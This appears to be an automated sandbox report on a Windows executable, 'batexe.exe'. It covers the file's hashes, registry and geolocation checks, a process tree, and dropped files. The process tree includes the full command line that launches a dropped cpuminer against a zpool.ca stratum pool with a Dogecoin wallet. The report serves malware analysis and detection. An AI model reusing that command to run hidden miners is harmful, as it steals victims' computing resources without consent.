73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 03:27

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4924	b2e.exe
644	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/800-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 800 wrote to memory of 4924	800	batexe.exe	89
PID 800 wrote to memory of 4924	800	batexe.exe	89
PID 800 wrote to memory of 4924	800	batexe.exe	89
PID 4924 wrote to memory of 1812	4924	b2e.exe	90
PID 4924 wrote to memory of 1812	4924	b2e.exe	90
PID 4924 wrote to memory of 1812	4924	b2e.exe	90
PID 1812 wrote to memory of 644	1812	cmd.exe	93
PID 1812 wrote to memory of 644	1812	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:800
- C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\63DA.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe

Filesize
6.8MB

MD5
2037d95b69bc8f86cafe4199f036740f

SHA1
7299fce8a36f05d6339921c7fe3d8d3e3232c6a4

SHA256
ed3df978ba5987abfabc545e293f980060a50482961c973bf5d7d8cb68004051

SHA512
73a99986eca12a6393c5e9aad050172f33fd504dfb5737759de1b4e7849617095347af8158489f8067f5dc9dbf8bdfd36087fb8f0cefb7c0981f213533c27c4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe

Filesize
2.1MB

MD5
a31425e05090fefc16b788728150027a

SHA1
8b81ea76280f7e3eba6c5fb5fc2678bb0fdc012f

SHA256
2f1729906e8b155bbc996dbeb481935169a52b03f9aaf544b164c9ff4cd36111

SHA512
d9ead49eea039b88d36bd7dde427d19c449588b120e590c25f87ed61252e774f435089c70294462de749e53f9733b766c5425999817e771ed1861fed462c6c5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe

Filesize
1.3MB

MD5
eb5c92ed5748802062d5815e19a794fc

SHA1
54342667baa34a4a062dc831551182f18510251f

SHA256
821aae232ae2272648b0a3899d079cc8ba8d09d1fc15fc74340942311328628f

SHA512
a072b213b8431c03ff9631615b9c01bcca96ee8f162c19661d036c4b91ffd69b76771ec42514c8dcac7b43e2e2520aa8abe78be5a2445490fb8313a714264a35

Download Submit
C:\Users\Admin\AppData\Local\Temp\63DA.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.7MB

MD5
1532b9aeea8b206faba938f8598db23a

SHA1
de5c1e7b6cce3e27dfac0c832da916673999f256

SHA256
d0053307c9b016b3e5b915c26a92c65ff766e1952ec5060c40a27ab3a0b16ed2

SHA512
a067e19dd4936cdc764a6c7eb38f51ff6add177700d87790489b37a91c23b2dad9d9a7c65210a720dd83fbdebd346e08b7d6a45824e502245748cab26740f0c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.2MB

MD5
2e149fe4b72bfbf9e107fd335cb0292f

SHA1
b61b27f7d66f79a35e67faa7c376b458c4532db1

SHA256
4e6d82f7823ca9a9bb22c6a1b041201c8b7e78fbb94801388405b0fc1df5ce04

SHA512
d1ac647030e43328154d8a92b6168f98c7c7fc7a9bbf7ee25398439b9b3a594e16288ed03f0a2c64485502771dec30dd24b5b195905bac03a5d8629d9ecd922b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
4a2801fa13173a94fefea14bbd669211

SHA1
97fcc54b85f96afb6955a0e336e9e11c8aa28caf

SHA256
5b460b955c1a51a709931095f7dbf1106a504d71cc3e5de597a435fba2366054

SHA512
e6d0d104e38d529458e61816d1c0cc094508590d76112b0236c6bd2c81c8a8351f26054d6c55351dacbccb8816427892c6921704f0fbebd1d937ec6a5a35cb96

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.9MB

MD5
b0dacd3eb82f35d29cc04d9d21f4d146

SHA1
fba2bd76b273f7aa63b5f9b02583b5b6831361cb

SHA256
a5a6cb72ea2c6556f87e6d1d05ebbbe803161ebffcea54fa21e89f3a95f30ae9

SHA512
74817b6f6d7bddeddce3fb7888637bcd969ad39396a91df3e922a7bd692eeca928670f17345113b3bd1eb3bf405f8595ba011c504c0806849c016ddc564cc380

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.3MB

MD5
b05f6d84ced9bbc804a51bc6f497e9ef

SHA1
c95be8cfc39cc417f175944ada17f468f7f0fcc8

SHA256
5814fdd0e7a43eb7cdae83c56f983b443d4746c7e558d48e39cfc23485c92f98

SHA512
6d45e399f2e066f4e9f50e0d26ae5d130cdb9c180e09d0b5bc2fd809fd4f81c309b1c8d60777f5c2cf93472a0d986627b4cb77672d72994a47b42eb4a2d634f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/644-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/644-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/644-46-0x0000000073C10000-0x0000000073CA8000-memory.dmp

Filesize
608KB

Download
memory/644-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/644-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/800-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4924-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4924-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download